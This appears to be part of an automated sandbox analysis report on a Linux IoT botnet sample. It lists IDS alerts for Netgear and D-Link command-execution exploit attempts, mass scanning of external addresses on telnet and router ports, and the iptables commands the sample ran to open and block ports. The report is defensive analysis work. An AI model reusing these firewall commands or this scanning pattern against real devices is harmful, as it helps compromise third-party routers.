  • Source: Traffic, Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:35942 -> 91.195.35.202:8080
  • Source: Traffic, Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:45572 -> 3.221.14.87:80
  • Source: Traffic, Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:45572 -> 3.221.14.87:80
  • Source: Traffic, Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:60680 -> 112.74.206.52:80
Connects to many ports of the same IP (likely port scanning)
                            Source: global trafficTCP traffic: 145.249.112.110 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 182.183.14.60 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 108.221.87.254 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 125.113.60.52 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 91.180.74.171 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 184.12.203.227 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 44.146.63.186 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 134.191.166.14 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 135.121.123.52 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 70.170.178.192 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 99.37.65.129 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 44.51.94.199 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 133.183.45.107 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 170.223.178.160 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 206.165.78.36 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 16.184.42.108 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 207.48.109.17 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 165.40.111.59 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 198.197.25.140 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 19.139.235.199 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 24.85.80.95 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 57.51.108.187 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 116.147.238.153 ports 1,2,3,5,7,37215
                            Uses known network protocols on non-standard ports
                            Source: unknown, Network traffic detected: HTTP traffic on port 23 -> 34674
                            Source: unknown, Network traffic detected: HTTP traffic on port 23 -> 34680
                            Source: unknown, Network traffic detected: HTTP traffic on port 23 -> 34684
                            Source: unknown, Network traffic detected: HTTP traffic on port 23 -> 34686
                            Source: unknown, Network traffic detected: HTTP traffic on port 23 -> 34688
                            Source: unknown, Network traffic detected: HTTP traffic on port 23 -> 34690
                            Source: unknown, Network traffic detected: HTTP traffic on port 23 -> 34692
                            Source: unknown, Network traffic detected: HTTP traffic on port 23 -> 34694
                            Source: unknown, Network traffic detected: HTTP traffic on port 23 -> 34696
                            Source: unknown, Network traffic detected: HTTP traffic on port 23 -> 35276
                            Source: unknown, Network traffic detected: HTTP traffic on port 23 -> 35278
                            Source: unknown, Network traffic detected: HTTP traffic on port 23 -> 35290
                            Source: unknown, Network traffic detected: HTTP traffic on port 23 -> 35292
                            Source: unknown, Network traffic detected: HTTP traffic on port 23 -> 35298
                            Source: unknown, Network traffic detected: HTTP traffic on port 23 -> 35300
                            Source: unknown, Network traffic detected: HTTP traffic on port 32848 -> 8443
                            Executes the "iptables" command to insert, remove and/or manipulate rules
                            Source: /bin/sh (PID: 6827) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6857) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6863) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6897) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6913) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6935) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6948) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6973) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6992) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                            Source: /bin/sh (PID: 6995) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                            Source: /bin/sh (PID: 6998) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                            Source: /bin/sh (PID: 7010) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                            Source: /bin/sh (PID: 7067) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                            Source: /bin/sh (PID: 7093) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                            Source: /bin/sh (PID: 7122) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                            Source: /bin/sh (PID: 7145) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                            Source: /bin/sh (PID: 7163) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                            Source: /bin/sh (PID: 7179) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                            Source: /bin/sh (PID: 7200) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                            Source: /bin/sh (PID: 7216) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                            Source: /bin/sh (PID: 7230) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                            Source: /bin/sh (PID: 7248) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                            Source: /bin/sh (PID: 7261) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                            Source: /bin/sh (PID: 7290) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                            Source: /bin/sh (PID: 7316) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7319) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7327) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7351) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7378) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7405) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7426) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7439) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 136.38.16.27:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 47.254.200.229:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 190.227.232.240:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 79.37.180.218:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 46.200.62.22:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 73.9.241.254:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 177.176.214.85:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 156.167.89.28:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 211.166.254.195:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 66.218.10.63:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 139.151.132.72:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 217.50.165.81:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 75.82.144.224:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 135.140.27.106:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 212.63.97.36:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 205.162.45.253:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 213.252.178.60:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 48.56.36.74:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 71.38.218.33:2323
                            Source: global trafficTCP traffic: 192.168.2.20:33868 -> 146.244.33.196:8080
                            Source: global trafficTCP traffic: 192.168.2.20:57874 -> 131.7.179.240:8080
                            Source: global trafficTCP traffic: 192.168.2.20:54196 -> 41.64.118.236:8080
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 188.176.86.229:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 212.167.165.252:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 122.243.242.25:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 111.0.125.36:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 185.50.62.97:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 59.172.13.97:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 188.200.140.122:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 115.42.52.37:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 183.16.231.232:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 206.17.179.29:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 112.254.112.252:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 174.47.48.224:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 66.178.106.107:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 88.38.36.48:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 207.253.148.221:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 63.43.183.132:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 76.81.222.62:2323
                            Source: global trafficTCP traffic: 192.168.2.20:35476 -> 220.165.204.143:8080
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 158.101.147.68:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 36.47.126.190:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 163.68.243.17:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 87.254.248.72:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 104.46.233.185:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 38.8.33.243:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 75.210.106.74:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 202.213.251.249:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 190.178.70.246:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 135.158.105.90:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 193.73.223.232:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 119.91.55.78:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 186.19.26.160:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 95.196.154.222:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 197.185.25.16:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 202.65.105.27:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 32.153.134.237:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 193.238.117.21:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 89.27.104.84:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 135.175.116.15:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 53.252.135.112:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 148.42.51.67:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 220.187.21.100:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 75.196.238.210:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 88.220.144.120:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 36.139.136.230:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 86.106.153.130:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 187.196.99.229:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 121.130.64.26:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 101.183.25.205:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 53.164.22.0:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 110.62.230.0:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 133.137.4.253:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 183.168.194.168:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 32.243.64.41:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 126.3.149.148:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 163.166.58.36:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 24.240.185.140:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 61.199.114.26:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 20.211.166.14:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 27.207.136.28:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 120.34.226.148:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 61.61.71.43:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 82.89.10.174:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 141.34.29.8:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 19.224.224.230:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 13.185.66.112:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 168.75.205.4:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 173.115.134.194:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 213.125.161.32:2323
                            Source: global trafficTCP traffic: 192.168.2.20:35492 -> 5.187.144.78:7574
                            Source: global trafficTCP traffic: 192.168.2.20:37100 -> 190.206.177.195:7574
                            Source: global trafficTCP traffic: 192.168.2.20:58838 -> 60.182.4.178:49152
                            Source: global trafficTCP traffic: 192.168.2.20:36900 -> 34.226.216.9:52869
                            Source: global trafficTCP traffic: 192.168.2.20:54874 -> 45.66.168.229:81
                            Source: global trafficTCP traffic: 192.168.2.20:49722 -> 148.119.94.202:8080
                            Source: global trafficTCP traffic: 192.168.2.20:60760 -> 124.100.92.68:8080
                            Source: global trafficTCP traffic: 192.168.2.20:47312 -> 168.144.37.63:7574
                            Source: global trafficTCP traffic: 192.168.2.20:55472 -> 31.65.174.196:8080
                            Source: global trafficTCP traffic: 192.168.2.20:59848 -> 179.86.197.224:8443
                            Source: global trafficTCP traffic: 192.168.2.20:55356 -> 79.74.222.218:8080
                            Source: global trafficTCP traffic: 192.168.2.20:35232 -> 12.118.224.5:8080
                            Source: global trafficTCP traffic: 192.168.2.20:49328 -> 194.139.111.238:8080
                            Source: global trafficTCP traffic: 192.168.2.20:41840 -> 26.34.213.157:49152
                            Source: global trafficTCP traffic: 192.168.2.20:36462 -> 161.230.34.156:37215
                            Source: global trafficTCP traffic: 192.168.2.20:37816 -> 37.98.108.113:81
                            Source: global trafficTCP traffic: 192.168.2.20:39546 -> 158.143.122.210:52869
                            Source: global trafficTCP traffic: 192.168.2.20:40436 -> 193.36.5.127:49152
                            Source: global trafficTCP traffic: 192.168.2.20:33418 -> 31.20.82.249:8080
                            Source: global trafficTCP traffic: 192.168.2.20:35740 -> 161.127.238.198:81
                            Source: global trafficTCP traffic: 192.168.2.20:50382 -> 136.113.197.35:8443
                            Source: global trafficTCP traffic: 192.168.2.20:48226 -> 83.41.228.148:8443
                            Source: global trafficTCP traffic: 192.168.2.20:41260 -> 37.126.224.143:52869
                            Source: global trafficTCP traffic: 192.168.2.20:53138 -> 101.227.190.33:5555
                            Source: global trafficTCP traffic: 192.168.2.20:48044 -> 111.240.142.16:7574
                            Source: global trafficTCP traffic: 192.168.2.20:55242 -> 158.38.176.82:8080
                            Source: global trafficTCP traffic: 192.168.2.20:58760 -> 140.134.218.225:8080
                            Source: global trafficTCP traffic: 192.168.2.20:49084 -> 184.61.35.161:5555
                            Source: global trafficTCP traffic: 192.168.2.20:51112 -> 116.25.201.150:8080
                            Source: global trafficTCP traffic: 192.168.2.20:59970 -> 196.198.124.215:8443
                            Source: global trafficTCP traffic: 192.168.2.20:50028 -> 52.16.235.82:8080
                            Source: global trafficTCP traffic: 192.168.2.20:42628 -> 58.30.72.177:49152
                            Source: global trafficTCP traffic: 192.168.2.20:35864 -> 173.110.61.196:7574
                            Source: global trafficTCP traffic: 192.168.2.20:59006 -> 135.4.185.97:8080
                            Source: global trafficTCP traffic: 192.168.2.20:38830 -> 143.147.160.1:81
                            Source: global trafficTCP traffic: 192.168.2.20:44456 -> 94.135.178.87:81
                            Source: global trafficTCP traffic: 192.168.2.20:58872 -> 72.99.199.177:49152
                            Source: global trafficTCP traffic: 192.168.2.20:58790 -> 151.74.246.170:81
                            Source: global trafficTCP traffic: 192.168.2.20:55876 -> 78.175.116.20:52869
                            Source: global trafficTCP traffic: 192.168.2.20:36794 -> 202.81.140.0:81
                            Source: global trafficTCP traffic: 192.168.2.20:60620 -> 53.134.248.119:52869
                            Source: global trafficTCP traffic: 192.168.2.20:55554 -> 26.147.179.51:52869
                            Source: global trafficTCP traffic: 192.168.2.20:54754 -> 176.102.246.130:5555
                            Source: global trafficTCP traffic: 192.168.2.20:39122 -> 56.151.171.111:8080
                            Source: global trafficTCP traffic: 192.168.2.20:48678 -> 113.254.69.147:7574
                            Source: global trafficTCP traffic: 192.168.2.20:48330 -> 206.27.21.74:5555
                            Source: global trafficTCP traffic: 192.168.2.20:48038 -> 39.252.230.232:8443
                            Source: global trafficTCP traffic: 192.168.2.20:55860 -> 190.71.92.106:49152
                            Source: global trafficTCP traffic: 192.168.2.20:43970 -> 149.145.117.99:5555
                            Source: global trafficTCP traffic: 192.168.2.20:46000 -> 44.188.108.249:8443
                            Source: global trafficTCP traffic: 192.168.2.20:60688 -> 8.132.20.149:8443
                            Source: global trafficTCP traffic: 192.168.2.20:35494 -> 74.119.4.125:8443
                            Source: global trafficTCP traffic: 192.168.2.20:42656 -> 22.158.74.158:5555
                            Source: global trafficTCP traffic: 192.168.2.20:35660 -> 216.40.146.138:8080
                            Source: global trafficTCP traffic: 192.168.2.20:58458 -> 126.239.116.72:8080
                            Source: global trafficTCP traffic: 192.168.2.20:33462 -> 208.33.128.23:8080
                            Source: global trafficTCP traffic: 192.168.2.20:54130 -> 222.204.252.34:5555
                            Source: global trafficTCP traffic: 192.168.2.20:51074 -> 44.141.251.112:49152
                            Source: global trafficTCP traffic: 192.168.2.20:59086 -> 155.192.173.3:49152
                            Source: global trafficTCP traffic: 192.168.2.20:50826 -> 92.82.252.190:5555
                            Source: global trafficTCP traffic: 192.168.2.20:46708 -> 34.144.238.160:8080
                            Source: global trafficTCP traffic: 192.168.2.20:46958 -> 98.137.65.157:52869
                            Source: global trafficTCP traffic: 192.168.2.20:60756 -> 72.89.219.141:8443
                            Source: global trafficTCP traffic: 192.168.2.20:36870 -> 216.127.243.47:8080
                            Source: global trafficTCP traffic: 192.168.2.20:41072 -> 180.119.171.72:5555
                            Source: global trafficTCP traffic: 192.168.2.20:51280 -> 173.235.230.238:8443
                            Source: global trafficTCP traffic: 192.168.2.20:47058 -> 207.230.142.20:8080
                            Source: global trafficTCP traffic: 192.168.2.20:37854 -> 140.64.139.164:8080
                            Source: global trafficTCP traffic: 192.168.2.20:55376 -> 51.170.75.171:37215
                            Source: global trafficTCP traffic: 192.168.2.20:45412 -> 200.164.44.27:37215
                            Source: global trafficTCP traffic: 192.168.2.20:48688 -> 51.238.146.201:81
                            Source: global trafficTCP traffic: 192.168.2.20:53756 -> 180.176.10.237:81
                            Source: global trafficTCP traffic: 192.168.2.20:38876 -> 73.43.76.24:5555
                            Source: global trafficTCP traffic: 192.168.2.20:34170 -> 85.61.49.109:8080
                            Source: global trafficTCP traffic: 192.168.2.20:58048 -> 19.79.231.29:8080
                            Source: global trafficTCP traffic: 192.168.2.20:40964 -> 70.113.63.226:8443
                            Source: global trafficTCP traffic: 192.168.2.20:52226 -> 211.44.209.80:8443
                            Source: global trafficTCP traffic: 192.168.2.20:49224 -> 157.5.200.51:7574
                            Source: global trafficTCP traffic: 192.168.2.20:56926 -> 56.179.20.91:49152
                            Source: global trafficTCP traffic: 192.168.2.20:37358 -> 75.244.195.175:8080
                            Source: global trafficTCP traffic: 192.168.2.20:42222 -> 71.113.61.118:49152
                            Source: global trafficTCP traffic: 192.168.2.20:36356 -> 96.105.199.49:7574
                            Source: global trafficTCP traffic: 192.168.2.20:48666 -> 219.171.175.178:49152
                            Source: global trafficTCP traffic: 192.168.2.20:48680 -> 152.77.109.165:81
                            Source: global trafficTCP traffic: 192.168.2.20:49400 -> 120.3.130.253:8443
                            Source: global trafficTCP traffic: 192.168.2.20:38714 -> 222.35.115.231:52869
                            Source: global trafficTCP traffic: 192.168.2.20:48808 -> 29.191.42.58:8080
                            Source: global trafficTCP traffic: 192.168.2.20:60036 -> 93.26.114.163:8080
                            Source: global trafficTCP traffic: 192.168.2.20:48434 -> 43.76.242.175:8080
                            Source: global trafficTCP traffic: 192.168.2.20:36502 -> 23.165.91.76:5555
                            Source: global trafficTCP traffic: 192.168.2.20:58162 -> 42.4.201.2:52869
                            Source: global trafficTCP traffic: 192.168.2.20:53462 -> 167.243.21.26:7574
                            Source: global trafficTCP traffic: 192.168.2.20:40934 -> 166.71.33.66:37215
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 126.173.187.250:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 212.251.42.151:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 54.26.235.219:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 115.36.198.11:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 163.136.89.118:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 106.43.189.61:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 39.236.0.254:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 209.120.183.182:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 184.238.11.237:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 9.151.116.206:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 124.181.145.82:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 182.106.163.140:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 90.179.152.71:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 77.253.34.142:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 106.160.177.38:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 83.190.188.81:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 12.199.143.201:2323
                            Source: global trafficTCP traffic: 192.168.2.20:32920 -> 97.191.181.246:52869
                            Source: global trafficTCP traffic: 192.168.2.20:35860 -> 67.159.181.184:8080
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 206.165.72.172:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 125.35.75.60:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 187.155.226.130:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 178.123.15.193:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 217.205.168.132:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 101.177.86.6:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 59.66.159.74:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 70.40.129.75:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 178.88.210.245:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 213.48.178.169:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 195.49.212.151:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 27.204.236.161:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 206.39.31.252:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 198.8.107.227:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 114.219.83.119:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 164.147.110.159:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 209.143.229.253:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 104.164.201.197:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 38.155.199.107:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 46.120.23.248:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 182.223.61.33:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 8.198.203.74:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 213.120.220.137:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 193.120.5.123:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 87.78.13.108:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 140.231.227.195:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 170.134.88.147:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 185.120.151.60:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 93.102.109.79:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 190.215.114.237:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 207.17.7.126:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 116.72.59.199:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 76.123.98.28:2323
                            Source: global trafficTCP traffic: 192.168.2.20:53474 -> 190.126.252.140:52869
                            Source: global trafficTCP traffic: 192.168.2.20:49638 -> 118.144.15.19:37215
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 179.67.151.112:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 72.214.7.65:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 71.199.207.110:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 191.185.159.193:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 57.124.145.13:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 145.200.155.76:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 34.110.165.234:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 67.241.120.56:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 2.254.169.42:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 145.25.76.245:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 209.162.247.31:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 44.185.101.89:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 189.147.158.128:2323
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 109.181.142.240:1023
                            Source: global trafficTCP traffic: 192.168.2.20:44211 -> 17.233.5.252:2323
